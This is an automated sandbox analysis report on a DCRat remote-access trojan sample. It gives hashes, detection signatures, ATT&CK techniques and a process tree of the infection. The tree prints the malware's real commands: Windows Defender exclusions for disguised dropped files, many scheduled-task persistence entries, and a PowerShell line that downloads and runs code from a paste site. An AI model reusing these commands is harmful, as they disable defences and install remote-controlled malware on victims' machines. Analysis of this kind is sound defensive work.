dcrat | 7a86a58b8a42ea523077932cbe77e25ae21d209ba09b4a2984a0adb1e7702e9f

Analysis

max time kernel
99s
max time network
143s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20241211-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20241211-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
08-01-2025 08:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

0.exe
Size

108KB
MD5

978077216937f404216319f621dbb269
SHA1

fe700220c4eb6fff630269ef33b77c2cb03aafec
SHA256

7a86a58b8a42ea523077932cbe77e25ae21d209ba09b4a2984a0adb1e7702e9f
SHA512

1c7eea824a6aef8aa56450f2c6904c751dda40b5ed48037672b2ed4d5745e2cb7d4d6ea83795ca53627d6ea53aa802046c78078bcd53420e6f6adff216d139f8
SSDEEP

1536:a4Sr7mdaQV3Vgzmh4DnF2SofJY0CvFbIDCbGjpS9gDHBShm4XZ7ygAY:ir7d+gzCOnESp0iGjRCXhZL

Score

10^/10

dcrat execution infostealer rat

Malware Config

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat
Dcrat family
dcrat

Process spawned unexpected child process 51 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4980	776	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5020	776	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4924	776	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3664	776	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4836	776	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2084	776	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1884	776	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3028	776	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2304	776	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3188	776	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3592	776	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4028	776	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4932	776	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	344	776	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1572	776	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3680	776	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1064	776	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2328	776	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3152	776	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3344	776	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5032	776	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	516	776	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3640	776	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3012	776	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	436	776	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4128	776	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1732	776	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4000	776	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2540	776	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2204	776	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3372	776	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4716	776	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3524	776	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1104	776	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4936	776	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	848	776	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2172	776	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3968	776	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2632	776	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2156	776	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5112	776	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3364	776	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2964	776	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2240	776	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1856	776	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3856	776	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1060	776	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	5016	776	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2628	776	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1128	776	schtasks.exe	86
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	636	776	schtasks.exe	86

DCRat payload 1 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

resource	yara_rule
behavioral2/memory/4676-3-0x000000001C070000-0x000000001C170000-memory.dmp	dcrat

Blocklisted process makes network request 3 IoCs

flow	pid	Process
29	5740	powershell.exe
30	5740	powershell.exe
33	5740	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 19 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2936	powershell.exe
1196	powershell.exe
4068	powershell.exe
4848	powershell.exe
4500	powershell.exe
1676	powershell.exe
4248	powershell.exe
3740	powershell.exe
4172	powershell.exe
4492	powershell.exe
1244	powershell.exe
1228	powershell.exe
1576	powershell.exe
5028	powershell.exe
2776	powershell.exe
5680	powershell.exe
1724	powershell.exe
1700	powershell.exe
2904	powershell.exe

Downloads MZ/PE file

Checks computer location settings 2 TTPs 3 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1798060429-1844192857-3165087720-1000\Control Panel\International\Geo\Nation	0.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1798060429-1844192857-3165087720-1000\Control Panel\International\Geo\Nation	services.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1798060429-1844192857-3165087720-1000\Control Panel\International\Geo\Nation	svchost.exe

Executes dropped EXE 2 IoCs

pid	Process
3092	services.exe
5676	svchost.exe

Drops file in Program Files directory 19 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Microsoft.NET\cc11b995f2a76d	0.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\dllhost.exe	0.exe
File created	C:\Program Files (x86)\Microsoft\Edge\Application\Idle.exe	0.exe
File created	C:\Program Files (x86)\Windows Mail\csrss.exe	0.exe
File created	C:\Program Files (x86)\Windows Media Player\Network Sharing\Idle.exe	0.exe
File created	C:\Program Files (x86)\Windows Media Player\Network Sharing\6ccacd8608530f	0.exe
File created	C:\Program Files\ModifiableWindowsApps\wininit.exe	0.exe
File created	C:\Program Files\Windows Multimedia Platform\services.exe	0.exe
File created	C:\Program Files\Windows Multimedia Platform\c5b4cb5e9653cc	0.exe
File created	C:\Program Files (x86)\Windows Mail\886983d96e3d3e	0.exe
File created	C:\Program Files (x86)\Windows NT\Accessories\en-US\WaaSMedicAgent.exe	0.exe
File created	C:\Program Files\VideoLAN\VLC\plugins\5940a34987c991	0.exe
File created	C:\Program Files (x86)\Microsoft\Edge\Application\6ccacd8608530f	0.exe
File created	C:\Program Files\Windows Portable Devices\sihost.exe	0.exe
File created	C:\Program Files\Windows Portable Devices\66fc9ff0ee96c2	0.exe
File created	C:\Program Files (x86)\Common Files\Java\Java Update\OfficeClickToRun.exe	0.exe
File created	C:\Program Files (x86)\Windows NT\Accessories\en-US\c82b8037eab33d	0.exe
File created	C:\Program Files (x86)\Microsoft.NET\winlogon.exe	0.exe
File created	C:\Program Files (x86)\Common Files\Java\Java Update\e6c9b481da804f	0.exe

Drops file in Windows directory 6 IoCs

description	ioc	Process
File created	C:\Windows\twain_32\5940a34987c991	0.exe
File created	C:\Windows\SchCache\explorer.exe	0.exe
File created	C:\Windows\SchCache\7a0fd90576e088	0.exe
File created	C:\Windows\Logs\StartMenuExperienceHost.exe	0.exe
File created	C:\Windows\Logs\55b276f4edf653	0.exe
File created	C:\Windows\twain_32\dllhost.exe	0.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Scheduled Task/Job: Scheduled Task 1 TTPs 52 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
4980	schtasks.exe
1884	schtasks.exe
3592	schtasks.exe
5032	schtasks.exe
516	schtasks.exe
1104	schtasks.exe
2632	schtasks.exe
5020	schtasks.exe
2304	schtasks.exe
3152	schtasks.exe
3372	schtasks.exe
2172	schtasks.exe
636	schtasks.exe
2084	schtasks.exe
3680	schtasks.exe
1064	schtasks.exe
2328	schtasks.exe
2156	schtasks.exe
1856	schtasks.exe
2628	schtasks.exe
4924	schtasks.exe
1572	schtasks.exe
3524	schtasks.exe
5112	schtasks.exe
2964	schtasks.exe
3856	schtasks.exe
1060	schtasks.exe
3028	schtasks.exe
3188	schtasks.exe
4932	schtasks.exe
344	schtasks.exe
3012	schtasks.exe
436	schtasks.exe
4716	schtasks.exe
1128	schtasks.exe
4128	schtasks.exe
1732	schtasks.exe
4000	schtasks.exe
848	schtasks.exe
3364	schtasks.exe
4836	schtasks.exe
4028	schtasks.exe
3640	schtasks.exe
2540	schtasks.exe
2204	schtasks.exe
4936	schtasks.exe
3968	schtasks.exe
3664	schtasks.exe
3344	schtasks.exe
2240	schtasks.exe
5016	schtasks.exe
5692	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4676	0.exe
4676	0.exe
4676	0.exe
4676	0.exe
4676	0.exe
4676	0.exe
4676	0.exe
4676	0.exe
4676	0.exe
4676	0.exe
4676	0.exe
4676	0.exe
4676	0.exe
4676	0.exe
4676	0.exe
4676	0.exe
4676	0.exe
4676	0.exe
4676	0.exe
4676	0.exe
4676	0.exe
4676	0.exe
4676	0.exe
4676	0.exe
4676	0.exe
4676	0.exe
4676	0.exe
4676	0.exe
1244	powershell.exe
1244	powershell.exe
4068	powershell.exe
4068	powershell.exe
2776	powershell.exe
2776	powershell.exe
3740	powershell.exe
3740	powershell.exe
1576	powershell.exe
1576	powershell.exe
4172	powershell.exe
4172	powershell.exe
1724	powershell.exe
1724	powershell.exe
1700	powershell.exe
1700	powershell.exe
4492	powershell.exe
4492	powershell.exe
4500	powershell.exe
4500	powershell.exe
1676	powershell.exe
1676	powershell.exe
4848	powershell.exe
4848	powershell.exe
2904	powershell.exe
2904	powershell.exe
3740	powershell.exe
4248	powershell.exe
4248	powershell.exe
1196	powershell.exe
1196	powershell.exe
2936	powershell.exe
2936	powershell.exe
5028	powershell.exe
5028	powershell.exe
4248	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4676	0.exe
Token: SeDebugPrivilege	3092	services.exe
Token: SeDebugPrivilege	3740	powershell.exe
Token: SeDebugPrivilege	1244	powershell.exe
Token: SeDebugPrivilege	4068	powershell.exe
Token: SeDebugPrivilege	2776	powershell.exe
Token: SeDebugPrivilege	1576	powershell.exe
Token: SeDebugPrivilege	4172	powershell.exe
Token: SeDebugPrivilege	1700	powershell.exe
Token: SeDebugPrivilege	1724	powershell.exe
Token: SeDebugPrivilege	4492	powershell.exe
Token: SeDebugPrivilege	4500	powershell.exe
Token: SeDebugPrivilege	4248	powershell.exe
Token: SeDebugPrivilege	1196	powershell.exe
Token: SeDebugPrivilege	1676	powershell.exe
Token: SeDebugPrivilege	4848	powershell.exe
Token: SeDebugPrivilege	2904	powershell.exe
Token: SeDebugPrivilege	1228	powershell.exe
Token: SeDebugPrivilege	2936	powershell.exe
Token: SeDebugPrivilege	5028	powershell.exe
Token: SeIncreaseQuotaPrivilege	3740	powershell.exe
Token: SeSecurityPrivilege	3740	powershell.exe
Token: SeTakeOwnershipPrivilege	3740	powershell.exe
Token: SeLoadDriverPrivilege	3740	powershell.exe
Token: SeSystemProfilePrivilege	3740	powershell.exe
Token: SeSystemtimePrivilege	3740	powershell.exe
Token: SeProfSingleProcessPrivilege	3740	powershell.exe
Token: SeIncBasePriorityPrivilege	3740	powershell.exe
Token: SeCreatePagefilePrivilege	3740	powershell.exe
Token: SeBackupPrivilege	3740	powershell.exe
Token: SeRestorePrivilege	3740	powershell.exe
Token: SeShutdownPrivilege	3740	powershell.exe
Token: SeDebugPrivilege	3740	powershell.exe
Token: SeSystemEnvironmentPrivilege	3740	powershell.exe
Token: SeRemoteShutdownPrivilege	3740	powershell.exe
Token: SeUndockPrivilege	3740	powershell.exe
Token: SeManageVolumePrivilege	3740	powershell.exe
Token: 33	3740	powershell.exe
Token: 34	3740	powershell.exe
Token: 35	3740	powershell.exe
Token: 36	3740	powershell.exe
Token: SeIncreaseQuotaPrivilege	2776	powershell.exe
Token: SeSecurityPrivilege	2776	powershell.exe
Token: SeTakeOwnershipPrivilege	2776	powershell.exe
Token: SeLoadDriverPrivilege	2776	powershell.exe
Token: SeSystemProfilePrivilege	2776	powershell.exe
Token: SeSystemtimePrivilege	2776	powershell.exe
Token: SeProfSingleProcessPrivilege	2776	powershell.exe
Token: SeIncBasePriorityPrivilege	2776	powershell.exe
Token: SeCreatePagefilePrivilege	2776	powershell.exe
Token: SeBackupPrivilege	2776	powershell.exe
Token: SeRestorePrivilege	2776	powershell.exe
Token: SeShutdownPrivilege	2776	powershell.exe
Token: SeDebugPrivilege	2776	powershell.exe
Token: SeSystemEnvironmentPrivilege	2776	powershell.exe
Token: SeRemoteShutdownPrivilege	2776	powershell.exe
Token: SeUndockPrivilege	2776	powershell.exe
Token: SeManageVolumePrivilege	2776	powershell.exe
Token: 33	2776	powershell.exe
Token: 34	2776	powershell.exe
Token: 35	2776	powershell.exe
Token: 36	2776	powershell.exe
Token: SeIncreaseQuotaPrivilege	4172	powershell.exe
Token: SeSecurityPrivilege	4172	powershell.exe

Suspicious use of WriteProcessMemory 56 IoCs

description	pid	Process	procid_target
PID 4676 wrote to memory of 1244	4676	0.exe	138
PID 4676 wrote to memory of 1244	4676	0.exe	138
PID 4676 wrote to memory of 1724	4676	0.exe	139
PID 4676 wrote to memory of 1724	4676	0.exe	139
PID 4676 wrote to memory of 1700	4676	0.exe	140
PID 4676 wrote to memory of 1700	4676	0.exe	140
PID 4676 wrote to memory of 4068	4676	0.exe	141
PID 4676 wrote to memory of 4068	4676	0.exe	141
PID 4676 wrote to memory of 1228	4676	0.exe	142
PID 4676 wrote to memory of 1228	4676	0.exe	142
PID 4676 wrote to memory of 2904	4676	0.exe	143
PID 4676 wrote to memory of 2904	4676	0.exe	143
PID 4676 wrote to memory of 1576	4676	0.exe	144
PID 4676 wrote to memory of 1576	4676	0.exe	144
PID 4676 wrote to memory of 1676	4676	0.exe	145
PID 4676 wrote to memory of 1676	4676	0.exe	145
PID 4676 wrote to memory of 5028	4676	0.exe	146
PID 4676 wrote to memory of 5028	4676	0.exe	146
PID 4676 wrote to memory of 4248	4676	0.exe	147
PID 4676 wrote to memory of 4248	4676	0.exe	147
PID 4676 wrote to memory of 2936	4676	0.exe	148
PID 4676 wrote to memory of 2936	4676	0.exe	148
PID 4676 wrote to memory of 4848	4676	0.exe	149
PID 4676 wrote to memory of 4848	4676	0.exe	149
PID 4676 wrote to memory of 1196	4676	0.exe	150
PID 4676 wrote to memory of 1196	4676	0.exe	150
PID 4676 wrote to memory of 2776	4676	0.exe	151
PID 4676 wrote to memory of 2776	4676	0.exe	151
PID 4676 wrote to memory of 3740	4676	0.exe	152
PID 4676 wrote to memory of 3740	4676	0.exe	152
PID 4676 wrote to memory of 4492	4676	0.exe	153
PID 4676 wrote to memory of 4492	4676	0.exe	153
PID 4676 wrote to memory of 4500	4676	0.exe	154
PID 4676 wrote to memory of 4500	4676	0.exe	154
PID 4676 wrote to memory of 4172	4676	0.exe	156
PID 4676 wrote to memory of 4172	4676	0.exe	156
PID 4676 wrote to memory of 3092	4676	0.exe	174
PID 4676 wrote to memory of 3092	4676	0.exe	174
PID 3092 wrote to memory of 5680	3092	services.exe	179
PID 3092 wrote to memory of 5680	3092	services.exe	179
PID 3092 wrote to memory of 5692	3092	services.exe	181
PID 3092 wrote to memory of 5692	3092	services.exe	181
PID 3092 wrote to memory of 5676	3092	services.exe	183
PID 3092 wrote to memory of 5676	3092	services.exe	183
PID 5676 wrote to memory of 2308	5676	svchost.exe	184
PID 5676 wrote to memory of 2308	5676	svchost.exe	184
PID 2308 wrote to memory of 5740	2308	cmd.exe	186
PID 2308 wrote to memory of 5740	2308	cmd.exe	186
PID 5740 wrote to memory of 3856	5740	powershell.exe	187
PID 5740 wrote to memory of 3856	5740	powershell.exe	187
PID 3856 wrote to memory of 4128	3856	cmd.exe	189
PID 3856 wrote to memory of 4128	3856	cmd.exe	189
PID 3856 wrote to memory of 5460	3856	cmd.exe	190
PID 3856 wrote to memory of 5460	3856	cmd.exe	190
PID 3856 wrote to memory of 6088	3856	cmd.exe	191
PID 3856 wrote to memory of 6088	3856	cmd.exe	191

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\0.exe
"C:\Users\Admin\AppData\Local\Temp\0.exe"
1⤵
- Checks computer location settings
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4676
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\0.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1244
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\twain_32\dllhost.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1724
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Microsoft.NET\winlogon.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1700
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Multimedia Platform\services.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4068
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\VideoLAN\VLC\plugins\dllhost.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious use of AdjustPrivilegeToken
  PID:1228
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\StartMenuExperienceHost.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2904
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Microsoft\Edge\Application\Idle.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1576
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Mail\csrss.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1676
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\sihost.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5028
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Common Files\Java\Java Update\OfficeClickToRun.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4248
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\wininit.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2936
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows Media Player\Network Sharing\Idle.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4848
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Music\sihost.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1196
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Windows NT\Accessories\en-US\WaaSMedicAgent.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2776
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\SearchApp.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3740
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\SchCache\explorer.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4492
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\backgroundTaskHost.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4500
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Logs\StartMenuExperienceHost.exe'
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4172
- C:\Program Files\Windows Multimedia Platform\services.exe
  "C:\Program Files\Windows Multimedia Platform\services.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3092
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\grabber\svchost.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:5680
- - C:\Windows\System32\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /Create /F /TN "svchost" /SC ONLOGON /TR "C:\Users\Admin\AppData\Roaming\grabber\svchost.exe" /RL HIGHEST
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:5692
- - C:\Users\Admin\AppData\Roaming\grabber\svchost.exe
    "C:\Users\Admin\AppData\Roaming\grabber\svchost.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:5676
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C powershell "iwr https://pastejustit.com/raw/msdcgy3bxg | iex"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2308
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "iwr https://pastejustit.com/raw/msdcgy3bxg | iex"
        5⤵
        Blocklisted process makes network request
        Suspicious use of WriteProcessMemory
        
        PID:5740
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\runtime.bat" "
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:3856
        
        C:\Windows\system32\findstr.exe
        
        findstr /i "echo" "C:\Users\Admin\AppData\Roaming\runtime.bat"
        7⤵
        
        PID:4128
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo \\DADDYSERVER "
        7⤵
        
        PID:5460
        
        C:\Windows\system32\findstr.exe
        
        findstr /i "DADDYSERVER"
        7⤵
        
        PID:6088

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 13 /tr "'C:\Windows\twain_32\dllhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4980

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Windows\twain_32\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5020

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 7 /tr "'C:\Windows\twain_32\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4924

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Microsoft.NET\winlogon.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3664

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft.NET\winlogon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4836

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Microsoft.NET\winlogon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2084

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 7 /tr "'C:\Program Files\Windows Multimedia Platform\services.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1884

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\Program Files\Windows Multimedia Platform\services.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3028

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "servicess" /sc MINUTE /mo 6 /tr "'C:\Program Files\Windows Multimedia Platform\services.exe'" /rl HIGHEST /f
